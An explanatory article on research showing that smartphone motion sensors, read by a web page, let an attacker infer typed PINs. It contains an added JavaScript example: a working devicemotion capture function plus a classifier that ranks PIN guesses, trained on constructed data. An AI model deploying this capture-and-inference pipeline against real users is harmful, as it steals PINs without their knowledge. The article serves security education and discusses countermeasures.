Researchers at Newcastle University have shown that attackers can use a smartphone's motion sensors to infer the PIN its user types.
A modern smartphone carries a lot of sensors: GPS, camera, microphone, fingerprint reader, accelerometer, gyroscope, light sensor, magnetometer, barometer, proximity sensor, thermometer and humidity sensor. Malicious software, or simply a malicious web page, can collect a great deal of personal data by reading their output. The motion sensors are the most exposed: a web page can read the accelerometer and gyroscope through JavaScript (the devicemotion and deviceorientation events) without any permission prompt in most browsers, so no app needs to be installed at all.
In this case the accelerometer and gyroscope are the relevant sensors. When a finger lands on the screen the phone tilts and vibrates slightly, and the movement depends on where the tap lands, so the stream of motion readings reveals touch actions, and a skilled attacker can turn them into the digits of a PIN.
The researchers had 10 smartphone users each enter a set of 50 four-digit PINs five times on a web page while the sensor output was recorded. Trained on that data, their neural network guessed the correct PIN on the first attempt 70% of the time and recovered every PIN within five guesses.
For comparison, a four-digit PIN has 10,000 possible values, so blind guessing succeeds 0.01% of the time on the first attempt. Within the experiment's fixed set of 50 PINs the chance level is 1 in 50, or 2%, which is the baseline the 70% first-guess result should be measured against.
The way a user holds the phone, scrolls and taps on it produces motion data that can be used to recover PINs.
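To make the mechanism concrete, the following is an added example and not code from the Newcastle study or from Sophos. It shows the pipeline a malicious page would need: capture devicemotion samples while the PIN is typed, cut them into one window per tap, turn each window into a feature vector, classify the key, and rank whole-PIN guesses so the attacker can try the best one first and the best five next. Everything it learns from is constructed: the sensor windows come from a simple physical model (the phone rotates toward the tapped row and column and the tap leaves an impulse on the accelerometer) on an assumed 3x4 keypad layout, and a nearest-centroid classifier stands in for the researchers' neural network. The feature set, noise model and PIN list are all assumptions made for the example.

```javascript
// Added example, not the researchers' code. Pipeline: motion samples -> per-tap window ->
// features -> key classifier -> ranked PIN guesses. All sensor data below is CONSTRUCTED.

const KEYS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9];

// Position of a key on an assumed 3x4 phone keypad (column 0..2 left to right, row 0..3 top to bottom).
function keyPosition(k) {
  return k === 0 ? { x: 1, y: 3 } : { x: (k - 1) % 3, y: Math.floor((k - 1) / 3) };
}

// Deterministic pseudo-random jitter in [-0.5, 0.5) so the run reproduces exactly.
function lcg(seed) {
  let s = seed >>> 0;
  return () => { s = (Math.imul(s, 1664525) + 1013904223) >>> 0; return s / 2 ** 32 - 0.5; };
}

// CONSTRUCTED tap window: n motion samples around one tap on key k. Rotation rate about the
// x axis follows the tapped row, about the y axis the tapped column, and the tap adds an
// accelerometer impulse. Real recordings are far noisier than this model.
function syntheticWindow(k, rnd, n = 10) {
  const { x, y } = keyPosition(k);
  const win = [];
  for (let i = 0; i < n; i++) {
    const impulse = i === n >> 1 ? 0.5 : 0;
    win.push({
      ax: (x - 1) * 0.3 + rnd() * 0.2,
      ay: (y - 1.5) * 0.3 + rnd() * 0.2,
      az: 9.8 + impulse + rnd() * 0.2,
      alpha: rnd() * 0.5,
      beta: (y - 1.5) * 2 + rnd(),   // rotation rate about x: follows the row
      gamma: (x - 1) * 2 + rnd(),    // rotation rate about y: follows the column
    });
  }
  return win;
}

// Feature vector for one window: mean and peak-to-peak range of every axis (12 numbers).
function extractFeatures(win) {
  const feats = [];
  for (const a of ['ax', 'ay', 'az', 'alpha', 'beta', 'gamma']) {
    const vals = win.map(s => s[a]);
    feats.push(vals.reduce((p, c) => p + c, 0) / vals.length, Math.max(...vals) - Math.min(...vals));
  }
  return feats;
}

// Nearest-centroid classifier, a stand-in for the paper's neural network.
class NearestCentroid {
  constructor() { this.centroids = new Map(); }
  fit(examples) {                        // examples: [{ key, features }]
    const acc = new Map();
    for (const { key, features } of examples) {
      const s = acc.get(key) || { n: 0, sum: new Array(features.length).fill(0) };
      s.n += 1; features.forEach((v, i) => { s.sum[i] += v; });
      acc.set(key, s);
    }
    for (const [key, s] of acc) this.centroids.set(key, s.sum.map(v => v / s.n));
  }
  // Keys ordered most to least likely; the score shrinks with Euclidean distance to the centroid.
  rank(features) {
    return [...this.centroids].map(([key, c]) => ({
      key, score: 1 / (1 + Math.hypot(...c.map((v, i) => v - features[i]))),
    })).sort((a, b) => b.score - a.score);
  }
}

// Beam search over the per-digit rankings: returns PIN guesses, best first.
function rankPins(perDigit, beam = 5) {
  let cands = [{ pin: '', score: 1 }];
  for (const ranking of perDigit) {
    const next = [];
    for (const c of cands) for (const r of ranking.slice(0, beam)) next.push({ pin: c.pin + r.key, score: c.score * r.score });
    cands = next.sort((a, b) => b.score - a.score).slice(0, beam * beam);
  }
  return cands.map(c => c.pin);
}

// Train on constructed windows, then attack PINs typed with fresh jitter.
// Returns, per PIN, the guess number at which it is recovered (1 = first guess), or Infinity.
function attack(pins, trainPerKey = 8) {
  const train = lcg(1), test = lcg(2), clf = new NearestCentroid();
  const examples = [];
  for (const k of KEYS) for (let i = 0; i < trainPerKey; i++) examples.push({ key: String(k), features: extractFeatures(syntheticWindow(k, train)) });
  clf.fit(examples);
  return pins.map(pin => {
    const perDigit = [...pin].map(d => clf.rank(extractFeatures(syntheticWindow(Number(d), test))));
    const idx = rankPins(perDigit).indexOf(pin);
    return idx < 0 ? Infinity : idx + 1;
  });
}

// Fraction of PINs recovered within k guesses (the study reports 70% at k = 1 and 100% at k = 5).
function successRate(ranks, k) { return ranks.filter(r => r <= k).length / ranks.length; }

// Browser capture side (does nothing under Node). Most browsers deliver devicemotion to any page
// with no prompt; Safari on iOS 13+ requires DeviceMotionEvent.requestPermission() from a user gesture.
async function startCapture(onSample) {
  if (typeof window === 'undefined' || typeof DeviceMotionEvent === 'undefined') return false;
  if (typeof DeviceMotionEvent.requestPermission === 'function' && (await DeviceMotionEvent.requestPermission()) !== 'granted') return false;
  window.addEventListener('devicemotion', e => onSample({
    ax: e.accelerationIncludingGravity?.x ?? 0, ay: e.accelerationIncludingGravity?.y ?? 0, az: e.accelerationIncludingGravity?.z ?? 0,
    alpha: e.rotationRate?.alpha ?? 0, beta: e.rotationRate?.beta ?? 0, gamma: e.rotationRate?.gamma ?? 0,
  }));
  return true;
}

const PINS = ['1234', '4071', '9063', '2580'];   // constructed PINs to attack
const ranks = attack(PINS);
console.log('guesses needed per PIN:', ranks, 'top-1:', successRate(ranks, 1), 'top-5:', successRate(ranks, 5));
```

Because the constructed windows are cleanly separable, the toy classifier recovers every PIN on the first guess; the point is the shape of the attack, not the accuracy. On real recordings the per-key classes overlap, which is why the study's first guess was right only 70% of the time and the attacker needs the ranked guess list to get to 100% by the fifth try. Note also that the capture side needs no exploit: registering a devicemotion listener is ordinary web API usage, which is exactly why the attack works from an ordinary page.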
One countermeasure would be to put sensor access behind a permission, so that users can deny it to suspicious apps and websites; at the time of the study neither mobile browsers nor the mobile operating systems asked before handing out motion-sensor data (Apple later added such a prompt to Safari on iOS 13). Users should also review an application's permissions before installing it, and changing PINs regularly remains a good habit, although it does not by itself stop an attacker who is already reading the sensors while the current PIN is typed.
For more information, see this post on one of the Sophos websites.